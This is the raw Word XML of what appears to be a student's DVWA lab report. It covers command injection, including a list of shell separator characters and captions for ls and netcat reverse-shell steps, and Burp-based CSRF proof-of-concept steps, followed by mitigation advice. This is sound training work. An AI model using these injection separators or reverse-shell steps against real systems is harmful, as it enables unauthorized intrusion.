    <w:p w14:paraId="05B5DED6" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D51">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00116D51">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00116D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Examples of Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D326EF7" w14:textId="3BD9DEF0" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D51">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00116D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00116D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/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6CE9B7" w14:textId="784ED06B" w:rsidR="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D51">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00116D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Low =  '||', '&amp;', ';', '|', '-', '$', '(', ')', '`', '&amp;&amp;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1C4B8" w14:textId="77777777" w:rsidR="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D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D274B" w14:textId="2EE9C55B" w:rsidR="00116D51" w:rsidRPr="002D4841" w:rsidRDefault="002D4841" w:rsidP="002D48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 Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E22EF1" w14:textId="29D87F09" w:rsidR="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116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BBD51D" wp14:editId="66E31E9A">
            <wp:extent cx="5745480" cy="2798445"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1905"/>
            <wp:docPr id="73741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98" cy="28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E6A4" w14:textId="77777777" w:rsidR="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00116D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F6AD0" w14:textId="30466726" w:rsidR="002D4841" w:rsidRPr="002D4841" w:rsidRDefault="002D4841" w:rsidP="002D48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841">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ls Command in burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9495FF" w14:textId="32B29D03" w:rsidR="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116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487FE3" wp14:editId="6EA5182E">
            <wp:extent cx="5731510" cy="3108960"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1068917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3E45" w14:textId="594EDD7A" w:rsidR="002D4841" w:rsidRDefault="002D4841" w:rsidP="002D48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ami  Command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5FBE7" w14:textId="50C05AEF" w:rsidR="002D4841" w:rsidRPr="002D4841" w:rsidRDefault="002D4841" w:rsidP="002D4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909E5B" wp14:editId="2EBD9301">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1295212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CDC9" w14:textId="49129388" w:rsidR="002D4841" w:rsidRPr="002D4841" w:rsidRDefault="002D4841" w:rsidP="002D48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16CED" w14:textId="2E3246E9" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc198745896"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9FA918" w14:textId="77777777" w:rsidR="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943"/>
    <w:p w14:paraId="130D4B4B" w14:textId="77777777" w:rsidR="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943"/>
    <w:p w14:paraId="77E1C42C" w14:textId="77777777" w:rsidR="00CC7943" w:rsidRPr="00CC7943" w:rsidRDefault="00CC7943" w:rsidP="00CC7943"/>
    <w:p w14:paraId="1BC47D80" w14:textId="6CE616C7" w:rsidR="002D4841" w:rsidRDefault="004C60AE" w:rsidP="002D4841">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc198745897"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="63D258BC" w14:textId="458AF09A" w:rsidR="007B384D" w:rsidRDefault="007B384D" w:rsidP="002D4841">
      <w:r>
        <w:t>1—nc Command for reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27303DDE" w14:textId="0C4BDAF8" w:rsidR="007B384D" w:rsidRDefault="007B384D" w:rsidP="002D4841">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="591E6253" wp14:editId="31852937">
            <wp:extent cx="5731510" cy="2963545"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="620701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C0DE" w14:textId="77777777" w:rsidR="007B384D" w:rsidRDefault="007B384D" w:rsidP="002D4841"/>
    <w:p w14:paraId="4E460698" w14:textId="0D448D36" w:rsidR="007B384D" w:rsidRDefault="007B384D" w:rsidP="002D4841">
      <w:r>
        <w:t>2 –</w:t>
      </w:r>
      <w:r w:rsidR="00C3342D">
        <w:t xml:space="preserve"> Start</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nc listener</w:t>
      </w:r>
      <w:r w:rsidR="00C3342D">
        <w:t xml:space="preserve"> before submit the nc payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E01BC09" w14:textId="0DB3B175" w:rsidR="007B384D" w:rsidRPr="002D4841" w:rsidRDefault="007B384D" w:rsidP="002D4841">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00CED181" wp14:editId="20C49B43">
            <wp:extent cx="5731510" cy="3078480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="13192058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11F4" w14:textId="38083E0B" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="004C60AE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc198745898"/>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="7BE92381" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D51">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00116D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>To prevent command injection, I recommend the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03F789" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D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D5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16D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C1D5C" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D5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51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Never trust user input. Use strict whitelisting (only allow IP format \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3F1D0D" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D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D5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16D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use Secure Functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464A5244" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D5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51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Avoid using system(), exec(), shell_exec().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C42CCAD" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D5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51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use language-level functions (e.g., Python’s subprocess.run() with shell=False).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2D7C0" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D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D5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16D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Output Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0B9E7D" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D5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51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Encode all output before displaying on the web page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC1506" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D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D5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16D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Least Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4F6B82" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D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51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Run web applications with limited permissions (non-root user).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC3C61" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D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D5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16D51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E05537D" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D5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51">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Use WAF to detect and block command injection patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369D9DBE" w14:textId="77777777" w:rsidR="00116D51" w:rsidRPr="00116D51" w:rsidRDefault="00116D51" w:rsidP="00116D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F40EE9C" w14:textId="77777777" w:rsidR="004C60AE" w:rsidRDefault="004C60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B3AD32" w14:textId="65F6D5DD" w:rsidR="004C60AE" w:rsidRDefault="004C60AE" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc198745899"/>
      <w:r w:rsidRPr="004C60AE">
        <w:t>CSRF_XSRF_SessionRiding_OneClick</w:t>
      </w:r>
      <w:r w:rsidR="009036BC">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="004C60AE">
        <w:t>Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="26629E4E" w14:textId="77349632" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc198745900"/>
      <w:r>
        <w:t>Intro</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="642B2396" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F3309">
      <w:p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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">During my assessment of DVWA, I tested the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
      <w:r w:rsidRPr="000F3309">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> module. This vulnerability allows an attacker like me to trick a logged-in victim into unknowingly submitting malicious requests to a web application on their behalf. It exploits the trust that a site has in the user’s browser session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660118D1" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F3309">
      <w:p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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is also referred to as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321F645" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F330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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>XSRF (Cross-Site Request Forgery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F1A7EE" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F330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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Session Riding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C440C2" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F330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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>One-Click Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F53084" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F3309">
      <w:p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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>If exploited, I could change user settings (like passwords) without their consent, just by making them visit a malicious page while logged in to the target web app.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE529BA" w14:textId="77777777" w:rsidR="000F3309" w:rsidRPr="000F3309" w:rsidRDefault="000F3309" w:rsidP="000F33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49B57" w14:textId="4046D5D0" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc198745901"/>
      <w:r>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="57AA8D83" w14:textId="5EC0ABB3" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E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2E25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CSRF_capt_Req_burp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4515B713" w14:textId="44627EF3" w:rsidR="00C3342D" w:rsidRPr="00C3342D" w:rsidRDefault="00C3342D" w:rsidP="00C334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ept the Request by Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7BE240" w14:textId="37B7C151" w:rsidR="00A62E25" w:rsidRPr="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E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D00CAB" wp14:editId="3723CBD8">
            <wp:extent cx="5731510" cy="2956560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14505577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BB75" w14:textId="3392FED1" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E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2E25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GenerateCSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A944F" w14:textId="48444A6F" w:rsidR="00C3342D" w:rsidRPr="00C3342D" w:rsidRDefault="00C3342D" w:rsidP="00C334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CSRF POC For the Request by inbuild Feature of burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23316714" w14:textId="24EA0172" w:rsidR="00A62E25" w:rsidRPr="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E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139ED" wp14:editId="0028C540">
            <wp:extent cx="5731510" cy="2968625"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="47949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813E" w14:textId="78C72C1E" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E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2E25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Copyhtml&amp;savefile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A0E17C" w14:textId="1AC51EC8" w:rsidR="00A62E25" w:rsidRPr="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E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B2B8D" wp14:editId="56792261">
            <wp:extent cx="5731510" cy="2922905"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15737670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E05F" w14:textId="5B09E6D1" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E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2E25">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>OpenFileFirefox&amp;Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31605ABA" w14:textId="6464CB57" w:rsidR="00C3342D" w:rsidRPr="00C3342D" w:rsidRDefault="00C3342D" w:rsidP="00C334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poc in firefox than submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B95E3EF" w14:textId="0CBC2BF2" w:rsidR="00A62E25" w:rsidRPr="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E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25456A" wp14:editId="4A41B993">
            <wp:extent cx="5731510" cy="2944495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="14549357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CA6F" w14:textId="24FB76DB" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc198745902"/>
      <w:r>
        <w:t>Med</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0CAA0E7F" w14:textId="45A34985" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r w:rsidRPr="00A62E25">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-- </w:t>
      </w:r>
      <w:r w:rsidRPr="00A62E25">
        <w:t>diff_cod</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609FCA7F" w14:textId="1E0C4C33" w:rsidR="00C3342D" w:rsidRDefault="00C3342D" w:rsidP="00A62E25">
      <w:r>
        <w:t>Check the Source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F0B7D3" w14:textId="66098953" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="754598BF" wp14:editId="246177E8">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11749635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A914" w14:textId="09D9ABF7" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:t>2—</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62E25">
        <w:t xml:space="preserve"> Capture_Req_Copy_Referer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724C674" w14:textId="4C4DD1BC" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="032FFB55" wp14:editId="0F435005">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5673334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16E3" w14:textId="07BBA3EA" w:rsidR="00C3342D" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:t xml:space="preserve">3— </w:t>
      </w:r>
      <w:r w:rsidRPr="00A62E25">
        <w:t>Generate_CSRF_Copy_Drop_Req.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A4F61" w14:textId="395DCE28" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EF4A597" wp14:editId="48A579ED">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15498909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7A83" w14:textId="56C72913" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:t xml:space="preserve">4— </w:t>
      </w:r>
      <w:r w:rsidRPr="00A62E25">
        <w:t>Open_html_Firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F013E35" w14:textId="5DEFF9B2" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="520144F1" wp14:editId="58121466">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18245762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61D4" w14:textId="53F1AE28" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:t xml:space="preserve">5— </w:t>
      </w:r>
      <w:r w:rsidRPr="00A62E25">
        <w:t>Capture_CSRF_Req_Paste_Referrer_Forward</w:t>
      </w:r>
      <w:r w:rsidR="0029543A">
        <w:t>_Req.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E809E72" w14:textId="54FE661A" w:rsidR="00A62E25" w:rsidRPr="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C76860" wp14:editId="737B30F5">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7650498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6C99" w14:textId="6A3533AE" w:rsidR="00C3478B" w:rsidRDefault="00C3478B" w:rsidP="00C3478B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc198745903"/>
      <w:r>
        <w:t>High</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="1E3F6C01" w14:textId="1C78651A" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:t xml:space="preserve">1— </w:t>
      </w:r>
      <w:r w:rsidRPr="00A62E25">
        <w:t>Check_XSS</w:t>
      </w:r>
      <w:r w:rsidR="0029543A">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidRPr="00A62E25">
        <w:t>vuln</w:t>
      </w:r>
      <w:r w:rsidR="0029543A">
        <w:t>erability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798A877A" w14:textId="056C80B6" w:rsidR="00650A90" w:rsidRDefault="00650A90" w:rsidP="00A62E25">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="397A03D2" wp14:editId="4E7E6421">
            <wp:extent cx="5731510" cy="3223895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5653914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E846" w14:textId="5C4AAD0C" w:rsidR="00A62E25" w:rsidRDefault="00A62E25" w:rsidP="00A62E25">
      <w:r>
        <w:t xml:space="preserve">2— </w:t>
      </w:r>
      <w:r w:rsidR="00650A90" w:rsidRPr="00650A90">
        <w:t>XSS_js_CSRF</w:t>
      </w:r>
    </w:p>
